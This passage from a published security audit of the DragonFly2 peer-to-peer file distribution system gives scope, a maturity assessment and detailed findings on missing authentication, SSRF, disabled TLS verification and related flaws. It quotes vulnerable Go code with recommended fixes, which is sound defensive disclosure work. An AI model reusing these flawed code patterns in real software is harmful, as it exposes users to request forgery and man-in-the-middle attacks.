NY 10003 \n https://www.trailofbits.com \n info@trailofbits.com \n Trail of Bits 1 DragonFly2 Security Assessment \n P U B L I C \n Notices and Remarks \n Copyright and Distribution \n © 2023 by Trail of Bits, Inc. \n All rights reserved. Trail of Bits hereby asserts its right to be identified as the creator of this \n report in the United Kingdom. \n This report is considered by Trail of Bits to be public information; it is licensed to OSTIF \n under the terms of the project statement of work and has been made public at OSTIF’s \n request. Material within this report may not be reproduced or distributed in part or in \n whole without the express written permission of Trail of Bits. \n The sole canonical source for Trail of Bits publications is the Trail of Bits Publications page . \n Reports accessed through any source other than that page may have been modified and \n should not be considered authentic. \n Test Coverage Disclaimer \n All activities undertaken by Trail of Bits in association with this project were performed in \n accordance with a statement of work and agreed upon project plan. \n Security assessment projects are time-boxed and often reliant on information that may be \n provided by a client, its affiliates, or its partners. As a result, the findings documented in \n this report should not be considered a comprehensive list of security issues, flaws, or \n defects in the target system or codebase. \n Trail of Bits uses automated testing techniques to rapidly test the controls and security \n properties of software. These techniques augment our manual security review work, but \n each has its limitations: for example, a tool may not generate a random edge case that \n violates a property or may not fully complete its analysis during the allotted time. Their use \n is also limited by the time and resource constraints of a project. \n Trail of Bits 2 DragonFly2 Security Assessment \n P U B L I C \n Table of Contents \n About Trail of Bits 1 \n Notices and Remarks 2 \n Table of Contents 3 \n Executive Summary 5 \n Project Summary 8 \n Project Goals 9 \n Project Targets 10 \n Project Coverage 11 \n Automated Testing 12 \n Codebase Maturity Evaluation 13 \n Summary of Findings 19 \n Detailed Findings 21 \n 1. Authentication is not enabled for some Manager’s endpoints 21 \n 2. Server-side request forgery vulnerabilities 23 \n 3. Manager makes requests to external endpoints with disabled TLS authentication \n 26 \n 4. Incorrect handling of a task structure’s usedTraffic field 28 \n 5. Directories created via os.MkdirAll are not checked for permissions 29 \n 6. Slicing operations with hard-coded indexes and without explicit length validation \n 30 \n 7. Files are closed without error check 32 \n 8. Timing attacks against Proxy’s basic authentication are possible 34 \n 9. Possible panics due to nil pointer dereference when using variables created \n alongside an error 35 \n 10. TrimLeft is used instead of TrimPrefix 37 \n 11. Vertex.DeleteInEdges and Vertex.DeleteOutEdges functions are not thread safe \n 39 \n 12. Arbitrary file read and write on a peer machine 41 \n 13. Manager generates mTLS certificates for arbitrary IP addresses 44 \n 14. gRPC requests are weakly validated 46 \n 15. Weak integrity checks for downloaded files 48 \n 16. Invalid error handling, missing return statement 51 \n 17. Tiny file download uses hard coded HTTP protocol 53 \n 18. Incorrect log message 54 \n Trail of Bits 3 DragonFly2 Security Assessment \n P U B L I C \n 19. Usage of architecture-dependent int type 56 \n A. Vulnerability Categories 57 \n B. Code Maturity Categories 59 \n C. Code Quality Issues 61 \n D. Automated Static Analysis 66 \n E. Automated Dynamic Analysis 68 \n F. Fix Review Results 72 \n Detailed Fix Review Results 74 \n G. Fix Review Status Categories 77 \n Trail of Bits 4 DragonFly2 Security Assessment \n P U B L I C \n Executive Summary \n Engagement Overview \n OSTIF engaged Trail of Bits to review the security of DragonFly2, a peer-to-peer file \n distribution system. \n A team of two consultants conducted the review from July 10, 2023 to July 21, 2023, for a \n total of four engineer-weeks of effort. Our testing efforts focused on potential privilege \n escalation and denial-of-service attacks. With full access to source code and \n documentation, we performed static and dynamic testing of the DragonFly2 codebase, \n using automated and manual processes. \n Observations and Impact \n The security review discovered numerous low-level vulnerabilities that could have been \n caught with more robust tests and static analysis (e.g., TOB-DF2-3 , TOB-DF2-7 , TOB-DF2-9 ). \n A few vulnerabilities manifest serious issues in the system’s design. Examples include the \n ability of remote peers to manipulate other peers’ filesystems ( TOB-DF2-12 ), which may \n result in remote code execution, and weak integrity verification of files and images shared \n in the network ( TOB-DF2-15 ). Moreover, dozens of features seem not to be fully \n implemented, which leads to critical vulnerabilities (e.g., TOB-DF2-13 ). \n Recommendations \n Based on the codebase maturity evaluation and findings identified during the security \n review, Trail of Bits recommends that the DragonFly2 developers take the following steps: \n ● Remediate the findings disclosed in this report. These findings should be \n addressed as part of a direct remediation or as part of any refactor that may occur \n when addressing other recommendations. \n ● Perform a threat modeling exercise. For every component in the system, \n enumerate all entrypoints and decide where to lay trust boundaries. From there, \n research risks related to using data from potentially malicious, external parties. The \n exercise should detect and find mitigations for issues like TOB-DF2-15 . Moreover, it \n should be accompanied by cryptographic protocol review, as the DragonFly2 system \n implements a Public Key Infrastructure architecture that is hard to implement \n securely. \n ● Redesign the file handling mechanism in peers. Currently, remote peers can fully \n control other peers’ filesystems. DragonFly2 should “sandbox” peers’ filesystems so \n that only a limited subset of the filesystem is used. \n Trail of Bits 5 DragonFly2 Security Assessment \n P U B L I C \n ● Remove support for the MD5 hashing algorithm. It does not provide any benefits \n over more secure algorithms like SHA256 or SHA3, and is not collision-resistant. The \n MD5 should not be supported, even optionally, to avoid downgrade attacks. \n ● Review implementations of low-level networking functionalities (e.g., HTTP \n proxy, HTTP header parsing) against standards and known attacks like request \n smuggling, parsing discrepancies, and mishandling of custom HTTP headers. In \n particular, establish trust assumptions around the Proxy component, and review \n relevant attack vectors to ensure that the component does not compromise the \n whole system's security. \n ● Finish implementation of DragonFly2. There are numerous TODO and FIXME \n comments in the whole codebase. Even security-critical features are currently not \n yet implemented, leaving the system in a state of ambiguous security guarantees. \n ● Advance static analysis used in the continuous integration (CI) pipeline. \n Currently, only CodeQL with default build settings and the default ruleset is used. \n The build settings may need adjustment so that the generated CodeQL database is \n complete, as building the DragonFly2 is a complex task. Adding tools like Semgrep \n and golangci-lint should follow. \n The following tables provide the number of findings by severity and category. \n Trail of Bits 6 DragonFly2 Security Assessment \n P U B L I C \n EXPOSURE ANALYSIS \n Severity Count \n High 5 \n Medium 1 \n Low 4 \n Inform ational 5 \n Undetermined 4 CATEGORY BREAKDOWN \n Category Count \n Auditing and Logging 1 \n Authentication 3 \n Configuration 1 \n Data Validation 9 \n Denial of Service 1 \n Error Report ing 1 \n Timing 2 \n Undefined Behavior 1 \n Trail of Bits 7 DragonFly2 Security Assessment \n P U B L I C \n Project Summary \n Contact Information \n The following managers were associated with this project: \n Dan Guido , Account Manager Jeff Braswell , Project Manager \n dan@trailofbits.com jeff.braswell@ trailofbits.com \n The following engineers were associated with this project: \n Paweł Płatek , Consultant Sam Alws , Consultant \n pawel.platek@trailofbits.com sam.alws@trailofbits.com \n Project Timeline \n The significant events and milestones of the project are listed below. \n Date Event \n July 6, 2023 Pre-project kickoff call \n July 18, 2023 Status update meeting \n July 24, 2023 Delivery of report draft \n July 24, 2023 Report readout meeting \n September 14, 2023 Delivery of comprehensive report \n Trail of Bits 8 DragonFly2 Security Assessment \n P U B L I C \n Project Goals \n The engagement was scoped to provide a security assessment of DragonFly2. Specifically, \n we sought to answer the following non-exhaustive list of questions: \n ● Is it possible to perform a denial-of-service attack on a DragonFly network? \n ● Is it possible for an attacker to gain administrative privileges? \n ● Are Man-in-the-Middle attacks that change the contents of transferred files \n possible? \n ● Can an attacker gain code execution or file access on a DragonFly node? \n ● Is potentially untrusted data always thoroughly validated? \n Trail of Bits 9 DragonFly2 Security Assessment \n P U B L I C \n Project Targets \n The engagement involved a review and testing of the targets listed below. \n Dragonfly2 \n Repository https://github.com/dragonflyoss \n Version b3a516804fb873d10d866979a0c6353b148cd3f1 \n Type Go \n Platform Unix, macOS \n Nydus \n Repository https://github.com/dragonflyoss/image-service \n Version 04fb92c5aa980deedf62e69cc2294195a88bab31 \n Type Rust \n Platform Unix, macOS \n Trail of Bits 10 DragonFly2 Security Assessment \n P U B L I C \n Project Coverage \n This section provides an overview of the analysis coverage of the review, as determined by \n our high-level engagement goals. Our approaches included the following: \n ● Use of Semgrep and CodeQL static analysis tools \n ● Use of fuzz testing on the gRPC handlers \n ● A manual review of client ( dfget daemon ), scheduler, and manager code. The \n review focused on externally accessible endpoints (e.g., gRPC, HTTP) and high-level \n business logic. \n ○ Many specialized features of these components were not reviewed due to \n time constraints (see next section). \n Coverage Limitations \n Because of the time-boxed nature of testing work, it is common to encounter coverage \n limitations. During this project, we were unable to perform comprehensive testing of the \n following system elem ents, which may warrant further review: \n ● dfcache and dfstore were only partially reviewed \n ● Clients configurations (code in client/config directory) \n ● Command-line programs (code in cmd directory) \n ● Example deployments (code in deploy and hack directory) \n ● Code in the internal directory \n ● The following parts of the Manager component: \n ○ Authentication (JWT, OAuth, RBAC) was only slightly reviewed \n ○ Cache \n ○ Database \n ○ Searcher \n ○ gRPC server (especially authentication) \n ● The scheduler/announcer subcomponent \n ● Code in the trainer directory and any other code related to Artificial Intelligence or \n Machine Learning features of DragonFly2 \n ● Code in the pkg directory, as only a very limited amount of the code that was tightly \n coupled with the reviewed components was audited \n Trail of Bits 11 DragonFly2 Security Assessment \n P U B L I C \n Automated Testing \n Trail of Bits uses automated techniques to extensively test the security properties of \n software. We use both open-source static analysis and fuzzing utilities, along with tools \n developed in house, to perform automated testing of source code and compiled software. \n Test Harness Configuration \n We used the following tools in the automated testing phase of this project: \n Tool Description Policy \n Semgrep An open-source static analysis tool for finding bugs and \n enforcing code standards when editing or committing code \n and during build time. Appendix D \n CodeQL A code analysis engine developed by GitHub to automate \n security checks. Appendix D \n Go fuzzing A standard, built-in Go fuzzer. Appendix E \n Trail of Bits 12 DragonFly2 Security Assessment \n P U B L I C \n Codebase Maturity Evaluation \n Trail of Bits uses a traffic-light protocol to provide each client with a clear understanding of \n the areas in which its codebase is mature, immature, or underdeveloped. Deficiencies \n identified here often stem from root causes within the software development life cycle that \n should be addressed through standardization measures (e.g., the use of common libraries, \n functions, or frameworks) or training and awareness programs. \n Category Summary Result \n Arithmetic No issues with arithmetic were detected during the audit. \n However, we noticed a lack of code checking for integer \n overflows. Due to time constraints, we have not verified \n whether overflows are possible. We recommend \n reviewing and testing the code against this kind of issue. \n Moreover, use of the architecture-dependent int type \n may impact system’s correctness (see TOB-DF2-19 ). Further \n Investigation \n Required \n Auditing Log density and the quality of information logged appear \n to be sufficient. However, we did not try to verify if that is \n true for all execution paths and if all information \n required to perform incident response is always logged. \n Moreover, the security controls for log transition, \n storage, integrity, retention and rotation, and monitoring \n and alerting mechanisms were not audited. Further \n Investigation \n Required \n Authentication / \n Access Controls We discovered numerous vulnerabilities resulting from \n incorrect or missing authentication and access controls. \n In general, it is unclear what are the trust assumptions \n and trust boundaries in the system. The DragonFly2 team \n should perform a threat modeling exercise to discover \n the assumptions, boundaries, and all relevant security \n controls, and to clarify and document possible high-level \n risks in the system. \n From a high-level perspective, our findings pose \n immediate questions about the following system’s \n properties: \n ● Which parts of Manager web UI should be Weak \n Trail of Bits 13 DragonFly2 Security Assessment \n P U B L I C \n authenticated and which are available publicly? \n ( TOB-DF2-1 ) \n ● Who should have network access to the Manager \n web UI? \n ● With what external parties does the Manager \n communicate? How can it authenticate the \n parties? How can the parties authenticate the \n Manager? ( TOB-DF2-3 ) \n ● For which connections TLS is enabled? How can it \n be configured? ( TOB-DF2-17 ) \n ● Who are the potential adversaries against which \n the Proxy’s authentication protects? \n ● What are the possible attack vectors against the \n Proxy? ( TOB-DF2-8 ) \n ● Is it assumed that a peer may try to gain arbitrary \n code execution capabilities on another peer’s \n machine? ( TOB-DF2-12 ) \n ● Should peers be able to access other peer’s files \n located in the whole filesystem, or only in specific \n parts of the filesystem? \n ● Should a dfget daemon have access to the \n whole filesystem, or should it operate only on a \n limited set of directories? \n ● How does the mutual TLS authentication provide \n authentication to peers? How does the TLS \n certificate issuer verify the authenticity of an \n actor requesting a certificate? ( TOB-DF2-13 ) \n ● How can TLS certificates be rotated and revoked? \n ● How can the Certificate Authority’s (CA) root \n certificate be rotated? \n ● How can peers securely obtain the correct CA \n certificate? \n ● How integrity of files and images distributed in a \n peer-to-peer network is verified? Who is \n responsible for the integrity verification and \n when? \n ● Do files and images integrity protections require \n collision resistance, or only preimage security? \n ( TOB-DF2-15 ) \n Complexity \n Management Multiple code pieces are a repeated, boilerplate code. \n One example is WithDefault * methods in a Proxy, \n which could be written in a more generic way. Another \n example is getter handlers in the Manager \n ( GetSchedulers , GetUsers , GetSeedPeerClusters , Moderate \n Trail of Bits 14 DragonFly2 Security Assessment \n P U B L I C \n …): because all of these functions follow the same \n structure with only minor differences, they could be \n extracted to a single, generic method. This will help to \n avoid copy-paste bugs like missing important method \n calls (e.g., calls to setPaginationDefault ). \n There are multiple TODO and FIXME comments, some of \n which indicate missing security controls (e.g., a comment \n indicating permanently disabled TLS ). Moreover, multiple \n context.TODO() methods are used, instead of well \n defined contexts. \n Some functions are not used, hindering code readability. \n Examples include the RandString and \n recoverFromPanic methods. \n Parallel v1 and v2 versions of components add a \n significant amount of complexity. A clearer way of \n migration between versions should be designed. Ideally, \n a code reviewer should see only code specific to a \n selected version. \n Configuration We did not review configuration of components. Not \n Considered \n Cryptography \n and Key \n Management DragonFly2 makes use of cryptography (e.g., TLS, x509 \n PKI for mTLS, user passwords authentication), but this \n area was not audited due to time constraints. We note \n that the system usually uses modern cryptographic \n libraries with robust algorithms (with the exception \n described in TOB-DF2-8 ). On the other hand, some \n critical operations, such as key generation and \n establishment of Certificate Authority keys, are not \n automated and are left for users to perform. Further \n Investigation \n Required \n Data Handling It is not certain which data is considered to be trusted \n and which is potentially malicious (this ambiguity \n resulted in, e.g., TOB-DF2-2 and TOB-DF2-12 ). Clarifying \n this will be beneficial, as having a clear threat model for \n the system will allow users to reason about the security \n guarantees it provides. The process could begin by, for \n example, enumerating all entrypoints to all system \n components. \n Data is validated to some extent, but there are missing Moderate \n Trail of Bits 15 DragonFly2 Security Assessment \n P U B L I C \n checks (see TOB-DF2-14 ). Validation routines are \n scattered in a few places (e.g., in the api repository and \n gRPC handlers ). Centralizing (limiting the amount of \n functions responsible for validation) and uniformizing \n (making similar validations for similar data types) data \n validation should increase the maturity of the system in \n this area. \n There are indications of overly fine-grained data \n handling. That is, there are operations that could be \n performed as one “block,” but are separated and so \n require developers to remember the steps involved in \n manual “execution” of all the pieces (e.g., TOB-DF2-4 ). \n Moreover, there is a problem of unnecessary custom \n code that deals with common problems, where an \n existing library or APIs could be used instead. For \n example, URLs are handled by regexes and string \n operations instead of dedicated net/url API; the Proxy \n component is written from the scratch, where the Go \n ecosystem probably offers a more robust, ready-to-use \n solution. \n Documentation Documentation on the website is very limited. It does not \n describe some DragonFly2 concepts (like what is a Job, \n Task, or Peer); does not provide actionable instructions \n for common tasks (e.g., usage of the Manager from web \n UI or CLI client); and does not explain configuration \n options in-depth. \n There is no documentation bound to the source code \n (e.g., inside the code repository) that would explain \n components’ structure in-depth. At minimum, a README \n file should be created for every module (e.g., \n client/daemon, client/dfget, pkg, manager) with \n information like the main functionality of the component, \n how it relates to other components, how the directory \n and file structure look from a functional perspective, and \n what are main function calls graphs. \n The docstrings coverage is almost sufficient, but should \n be improved. Some important interfaces, structures, and \n methods are not documented. This makes it hard to \n reason about functionality and the security assumptions \n of specific functions. For example, it is not obvious what Moderate \n Trail of Bits 16 DragonFly2 Security Assessment \n P U B L I C \n the Task structure’s AddTraffic method does, nor how \n it handles integer overflows. \n Some documentation is outdated. For example, the state \n machine shown on the “Scheduler” documentation page \n is missing some of the states present in the state \n machine in the code. \n Maintenance We did not review the security of external components, \n which versions of such components are used by the \n DragonFly2, or whether the DragonFly2 team has \n technical or procedural controls for maintaining and \n updating its dependencies. \n We observed code that was copy-pasted from external \n codebases (see appendix C, issue 8 ). Further \n investigation is required to decide on the security of that \n approach to incorporating external code. It may be \n beneficial for the DragonFly2 system to design a more \n robust way of dealing with such code (e.g., by vendoring \n the code, or by looking for small, alternative packages \n implementing desired functionalities). Further \n Investigation \n Required \n Memory Safety \n and Error \n Handling The Go language is memory-safe, so we did not review \n potential memory safety issues. \n Error handling generally follows standard Go practices, \n except that some functions’ error values are ignored and \n there are multiple unchecked type assertions. These \n error-prone patterns require further investigation to \n determine if they pose exploitable risks to the system. \n Moreover, we observed a few bugs in the error handling \n ( TOB-DF2-16 , TOB-DF2-9 ), which should be dealt with by \n increasing test coverage and implementation of more \n advanced static analysis. Moderate \n Testing and \n Verification Unit and integration tests are included throughout the \n codebase. Due to the time constraints on this audit, we \n were not able to verify the thoroughness of the tests. \n Some static analysis tools are used in the CI pipeline, but \n more advanced configurations and tooling could be \n incorporated. Further \n Investigation \n Required \n Trail of Bits 17 DragonFly2 Security Assessment \n P U B L I C \n There is no fuzzing nor property testing. \n Trail of Bits 18 DragonFly2 Security Assessment \n P U B L I C \n Summary of Findings \n The table below summarizes the findings of the review, including type and severity details. \n ID Title Type Severity \n 1 Authentication is not enabled for some Manager’s \n endpoints Authentication Undetermined \n 2 Server-side request forgery vulnerabilities Data Validation High \n 3 Manager makes requests to external endpoints \n with disabled TLS authentication Authentication Low \n 4 Incorrect handling of a task structure’s usedTraffic \n field Data Validation Low \n 5 Directories created via os.MkdirAll are not \n checked for permissions Data Validation Low \n 6 Slicing operations with hard-coded indexes and \n without explicit length validation Data Validation Inform ational \n 7 Files are closed without error check Undefined \n Behavior Low \n 8 Timing attacks against Proxy’s basic \n authentication are possible Timing Undetermined \n 9 Possible panics due to nil pointer dereference \n when using variables created alongside an error Denial of Service Medium \n 10 TrimLeft is used instead of TrimPrefix Data Validation Inform ational \n 11 Vertex.DeleteInEdges and Vertex.DeleteOu tEdges \n functions are not thread safe Timing Undetermined \n 12 Arbitrary file read and write on a peer machine Data Validation High \n Trail of Bits 19 DragonFly2 Security Assessment \n P U B L I C \n 13 Manager generates mTLS certificates for arbitrary \n IP addresses Authentication High \n 14 gRPC requests are weakly validated Data Validation Undetermined \n 15 Weak integrity checks for downloaded files Data Validation High \n 16 Invalid error handling, missing return statement Error Reporting Inform ational \n 17 Tiny file download uses hard coded HTTP protocol Configuration High \n 18 Incorrect log message Auditing and \n Logging Inform ational \n 19 Usage of architecture-dependent int type Data Validation Inform ational \n Trail of Bits 20 DragonFly2 Security Assessment \n P U B L I C \n Detailed Findings \n 1. Authentication is not enabled for some Manager’s endpoints \n Severity: Undetermined Difficulty: High \n Type: Authentication Finding ID: TOB-DF2-1 \n Target: Dragonfly2/manager/router/router.go \n Description \n The /api/v1/jobs and /preheats endpoints in Manager web UI are accessible without \n authentication. Any user with network access to the Manager can create, delete, and \n modify jobs, and create preheat jobs. \n job := apiv1.Group( \"/jobs\" ) \n Figure 1.1: The /api/v1/jobs endpoint definition \n ( Dragonfly2/manager/router/router.go#191 ) \n // Compatible with the V1 preheat. \n pv1 := r.Group( \"/preheats\" ) \n r.GET( \"_ping\" , h.GetHealth) \n pv1.POST( \"\" , h.CreateV1Preheat) \n pv1.GET( \":id\" , h.GetV1Preheat) \n Figure 1.2: The /preheats endpoint definition \n ( Dragonfly2/manager/router/router.go#206–210 ) \n Exploit Scenario \n An unauthenticated adversary with network access to a Manager web UI uses \n /api/v1/jobs endpoint to create hundreds of useless jobs. The Manager is in a \n denial-of-service state, and stops accepting requests from valid administrators. \n Recommendations \n Short term, add authentication and authorization to the /api/v1/jobs and /preheats \n endpoints. \n Long term, rewrite the Manager web API so that all endpoints are authenticated and \n authorized by default, and only selected endpoints explicitly disable these security controls. \n Alternatively, rewrite the API into public and private parts using groups, as demonstrated in \n Trail of Bits 21 DragonFly2 Security Assessment \n P U B L I C \n this comment . The proposed design will prevent developers from forgetting to protect \n some endpoints. \n Trail of Bits 22 DragonFly2 Security Assessment \n P U B L I C \n 2. Server-side request forgery vulnerabilities \n Severity: High Difficulty: Medium \n Type: Data Validation Finding ID: TOB-DF2-2 \n Target: Various locations \n Description \n There are multiple server-side request forgery (SSRF) vulnerabilities in the DragonFly2 \n system. The vulnerabilities enable users to force DragonFly2’s components to make \n requests to internal services, which otherwise are not accessible to the users. \n One SSRF attack vector is exposed by the Manager’s API. The API allows users to create \n jobs. When creating a Preheat type of a job, users provide a URL that the Manager connects \n to (see figures 2.1–2.3). The URL is weakly validated, and so users can trick the Manager \n into sending HTTP requests to services that are in the Manager’s local network. \n func (p *preheat) CreatePreheat(ctx context.Context, schedulers []models.Scheduler, \n json types.PreheatArgs) (*internaljob.GroupJobState, error ) { \n [skipped] \n url := json.URL \n [skipped] \n // Generate download files \n var files []internaljob.PreheatRequest \n switch PreheatType(json.Type) { \n case PreheatImageType: \n // Parse image manifest url \n skipped , err := parseAccessURL(url) \n [skipped] \n files, err = p.getLayers(ctx, url, tag, filter, \n nethttp.MapToHeader(rawheader), image) \n [skipped] \n case PreheatFileType: \n [skipped] \n } \n Figure 2.1: A method handling Preheat job creation requests \n ( Dragonfly2/manager/job/preheat.go#89–132 ) \n func (p *preheat) getLayers (ctx context.Context, url, tag, filter string , header \n http.Header, image *preheatImage) ([]internaljob.PreheatRequest, error ) { \n Trail of Bits 23 DragonFly2 Security Assessment \n P U B L I C \n ctx, span := tracer.Start(ctx, config.SpanGetLayers, \n trace.WithSpanKind(trace.SpanKindProducer)) \n defer span.End() \n resp, err := p.getManifests(ctx, url, header) \n Figure 2.2: A method called by the CreatePreheat function \n ( Dragonfly2/manager/job/preheat.go#176–180 ) \n func (p *preheat) getManifests(ctx context.Context, url string , header http.Header) \n (*http.Response, error ) { \n req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil ) \n if err != nil { \n return nil , err \n } \n req.Header = header \n req.Header.Add(headers.Accept, schema2.MediaTypeManifest) \n client := &http.Client{ \n Timeout: defaultHTTPRequesttimeout, \n Transport: &http.Transport{ \n TLSClientConfig: &tls.Config{InsecureSkipVerify: true }, \n }, \n } \n resp, err := client.Do(req) \n if err != nil { \n return nil , err \n } \n return resp, nil \n } \n Figure 2.3: A method called by the getLayers function \n ( Dragonfly2/manager/job/preheat.go#211–233 ) \n A second attack vector is in peer-to-peer communication. A peer can ask another peer to \n make a request to an arbitrary URL by triggering the pieceManager.DownloadSource \n method (figure 2.4), which calls the httpSourceClient.GetMetadata method, which \n performs the request. \n func (pm *pieceManager) DownloadSource(ctx context.Context, pt Task, peerTaskRequest \n *schedulerv1.PeerTaskRequest, parsedRange *nethttp.Range) error { \n Figure 2.4: Signature of the DownloadSource function \n ( Dragonfly2/client/daemon/peer/piece_manager.go#301 ) \n Another attack vector is due to the fact that HTTP clients used by the DragonFly2’s \n components do not disable support for HTTP redirects. This configuration means that an \n Trail of Bits 24 DragonFly2 Security Assessment \n P U B L I C \n HTTP request sent to a malicious server may be redirected by the server to a component’s \n internal service. \n Exploit Scenario \n An unauthenticated user with access to the Manager API registers himself with a guest \n account. The user creates a preheat job—he is allowed to do so, because of a bug \n described in TOB-DF2-1 —with a URL pointing to an internal service. The Manager makes \n the request to the service on behalf of the malicious user. \n Recommendations \n Short term, investigate all potential SSRF attack vectors in the DragonFly2 system and \n mitigate risks by either disallowing requests to internal networks or creating an allowlist \n configuration that would limit networks that can be requested. Disable automatic HTTP \n redirects in HTTP clients. Alternatively, inform users about the SSRF attack vectors and \n provide them with instructions on how to mitigate this attack on the network level (e.g., by \n configuring firewalls appropriately). \n Long term, ensure that applications cannot be tricked to issue requests to arbitrary \n locations provided by its users. Consider implementing a single, centralized class \n responsible for validating the destinations of requests. This will increase code maturity with \n respect to HTTP request handling. \n Trail of Bits 25 DragonFly2 Security Assessment \n P U B L I C \n 3. Manager makes requests to external endpoints with disabled TLS \n authentication \n Severity: Low Difficulty: Low \n Type: Authentication Finding ID: TOB-DF2-3 \n Target: Dragonfly2/manager/job/preheat.go \n Description \n The Manager disables TLS certificate verification in two HTTP clients (figures 3.1 and 3.2). \n The clients are not configurable, so users have no way to re-enable the verification. \n func getAuthToken(ctx context.Context, header http.Header) ( string , error ) { \n [skipped] \n client := &http.Client{ \n Timeout: defaultHTTPRequesttimeout, \n Transport: &http.Transport{ \n TLSClientConfig: &tls.Config{InsecureSkipVerify: true }, \n }, \n } \n [skipped] \n } \n Figure 3.1: getAuthToken function with disabled TLS certificate verification \n ( Dragonfly2/manager/job/preheat.go#261–301 ) \n func (p *preheat) getManifests(ctx context.Context, url string , header http.Header) \n (*http.Response, error ) { \n [skipped] \n client := &http.Client{ \n Timeout: defaultHTTPRequesttimeout, \n Transport: &http.Transport{ \n TLSClientConfig: &tls.Config{InsecureSkipVerify: true }, \n }, \n } \n [skipped] \n } \n Figure 3.2: getManifests function with disabled TLS certificate verification \n ( Dragonfly2/manager/job/preheat.go#211–233 ) \n Trail of Bits 26 DragonFly2 Security Assessment \n P U B L I C \n Exploit Scenario \n A Manager processes dozens of preheat jobs. An adversary performs a network-level \n Man-in-the-Middle attack, providing invalid data to the Manager. The Manager preheats \n with the wrong data, which later causes a denial of service and file integrity problems. \n Recommendations \n Short term, make the TLS certificate verification configurable in the getManifests and \n getAuthToken methods. Preferably, enable the verification by default. \n Long term, enumerate all HTTP, gRPC, and possibly other clients that use TLS and \n document their configurable and non-configurable (hard-coded) settings. Ensure that all \n security-relevant settings are configurable or set to secure defaults. Keep the list up to date \n with the code. \n Trail of Bits 27 DragonFly2 Security Assessment \n P U B L I C \n 4. Incorrect handling of a task structure’s usedTra\u0000c field \n Severity: Low Difficulty: Medium \n Type: Data Validation Finding ID: TOB-DF2-4 \n Target: Dragonfly2/client/daemon/peer/piece_manager.go \n Description \n The processPieceFromSource method (figure 4.1) is part of a task processing \n mechanism. The method writes pieces of data to storage, updating a Task structure along \n the way. The method does not update the structure’s usedTraffic field, because an \n uninitialized variable n is used as a guard to the AddTraffic method call, instead of the \n result.Size variable. \n var n int64 \n result.Size, err = pt.GetStorage().WritePiece( [skipped] ) \n result.FinishTime = time.Now().UnixNano() \n if n > 0 { \n pt.AddTraffic( uint64 (n)) \n } \n Figure 4.1: Part of the processPieceFromSource method with a bug \n ( Dragonfly2/client/daemon/peer/piece_manager.go#264–290 ) \n Exploit Scenario \n A task is processed by a peer. The usedTraffic metadata is not updated during the \n processing. Rate limiting is incorrectly applied, leading to a denial-of-service condition for \n the peer. \n Recommendations \n Short term, replace the n variable with the result.Size variable in the \n processPieceFromSource method. \n Long term, add tests for checking if all Task structure fields are correctly updated during \n task processing. Add similar tests for other structures. \n Trail of Bits 28 DragonFly2 Security Assessment \n P U B L I C \n 5. Directories created via os.MkdirAll are not checked for permissions \n Severity: Low Difficulty: High \n Type: Data Validation Finding ID: TOB-DF2-5 \n Target: Various locations \n Description \n DragonFly2 uses the os.MkdirAll function to create certain directory paths with specific \n access permissions. This function does not perform any permission checks when a given \n directory path already exists. This allows a local attacker to create a directory to be used \n later by DragonFly2 with broad permissions before DragonFly2 does so, potentially allowing \n the attacker to tamper with the files. \n Exploit Scenario \n Eve has unprivileged access to the machine where Alice uses DragonFly2. Eve watches the \n commands executed by Alice and introduces new directories/paths with 0777 permissions \n before DragonFly2 does so. Eve can then delete and forge files in that directory to change \n the results of further commands executed by Alice. \n Recommendations \n Short term, when using utilities such as os.MkdirAll , os.WriteFile , or \n outil.WriteFile , check all directories in the path and validate their owners and \n permissions before performing operations on them. This will help avoid situations where \n sensitive information is written to a pre-existing attacker-controlled path. Alternatively, \n explicitly call the chown and chmod methods on newly created files and permissions. We \n recommend making a wrapper method around file and directory creation functions that \n would handle pre-existence checks or would chain the previously mentioned methods. \n Long term, enumerate files and directories for their expected permissions overall, and \n build validation to ensure appropriate permissions are applied before creation and upon \n use. Ideally, this validation should be centrally defined and used throughout the entire \n application. \n Trail of Bits 29 DragonFly2 Security Assessment \n P U B L I C \n 6. Slicing operations with hard-coded indexes and without explicit length \n validation \n Severity: Informational Difficulty: High \n Type: Data Validation Finding ID: TOB-DF2-6 \n Target: Dragonfly2/client/daemon/peer/piece_downloader.go, \n Dragonfly2/scheduler/resource/peer.go \n Description \n In the buildDownloadPieceHTTPRequest and DownloadTinyFile methods (figures 6.1 \n and 6.2), there are array slicing operations with hard-coded indexes. If the arrays are \n smaller than the indexes, the code panics. \n This finding’s severity is informational, as we were not able to trigger the panic with a \n request from an external actor. \n func (p *pieceDownloader) buildDownloadPieceHTTPRequest(ctx context.Context, d \n *DownloadPieceRequest) *http.Request { \n // FIXME switch to https when tls enabled \n targetURL := url.URL{ \n Scheme: p.scheme, \n Host: d.DstAddr, \n Path: fmt.Sprintf( \"download/%s/%s\" , d.TaskID[: 3 ], d.TaskID), \n RawQuery: fmt.Sprintf( \"peerId=%s\" , d.DstPid), \n } \n Figure 6.1: If d.TaskID length is less than 3, the code panics \n ( Dragonfly2/client/daemon/peer/piece_downloader.go#198–205 ) \n func (p *Peer) DownloadTinyFile() ([] byte , error ) { \n ctx, cancel := context.WithTimeout(context.Background(), \n downloadTinyFileContextTimeout) \n defer cancel() \n // Download url: \n http://${host}:${port}/download/${taskIndex}/${taskID}?peerId=${peerID} \n targetURL := url.URL{ \n Scheme: \"http\" , \n Host: fmt.Sprintf( \"%s:%d\" , p.Host.IP, p.Host.DownloadPort), \n Path: fmt.Sprintf( \"download/%s/%s\" , p.Task.ID[: 3 ], p.Task.ID), \n RawQuery: fmt.Sprintf( \"peerId=%s\" , p.ID), \n } \n Trail of Bits 30 DragonFly2 Security Assessment \n P U B L I C \n Figure 6.2: If p.Task.ID length is less than 3, the code panics \n ( Dragonfly2/scheduler/resource/peer.go#436–446 ) \n Recommendations \n Short term, explicitly validate lengths of arrays before performing slicing operations with \n hard-coded indexes. If the arrays are known to always be of sufficient size, add a comment \n in code to indicate this, so that further reviewers of the code will not have to triage this \n false positive. \n Long term, add fuzz testing to the codebase. This type of testing helps to identify missing \n data validation and inputs triggering panics. \n Trail of Bits 31 DragonFly2 Security Assessment \n P U B L I C \n 7. Files are closed without error check \n Severity: Low Difficulty: High \n Type: Undefined Behavior Finding ID: TOB-DF2-7 \n Target: Various locations \n Description \n Several methods in the DragonFly2 codebase defer file close operations after writing to a \n file. This may introduce undefined behavior, as the file’s content may not be flushed to disk \n until the file has been closed. \n Errors arising from the inability to flush content to disk while closing will not be caught, and \n the application may assume that content was written to disk successfully. See the example \n in figure 7.1. \n file, err := 